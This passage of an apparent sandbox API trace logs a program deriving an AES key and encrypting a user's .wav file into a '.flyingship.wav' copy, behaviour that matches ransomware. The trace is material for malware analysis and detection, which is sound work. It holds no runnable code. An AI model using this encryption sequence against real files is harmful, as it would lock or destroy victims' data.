wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.889] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.915] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0184.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.915] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.915] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.916] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.916] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0184.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.916] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0184.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.916] CryptDestroyHash (hHash=0x90ae18) returned 1 [0184.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\apddf3aozrxaheczyap.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.918] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.918] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0184.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.918] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0184.919] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0184.919] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0184.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0184.921] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n")) returned 0x10 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0184.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\apddf3aozrxaheczyap.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0184.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0184.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0184.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0184.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0184.924] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0184.924] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xdf62, lpOverlapped=0x0) returned 1 [0184.929] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0184.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xdf62) returned 0xbea018 [0184.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0184.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xdf62) returned 0xbf7f88 [0184.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.931] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xdf62) returned 0xbea018 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0184.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.932] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xdf62) returned 0xbea018 [0184.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.933] RtlAllocateHeap (HeapHandle=0x8a0000, 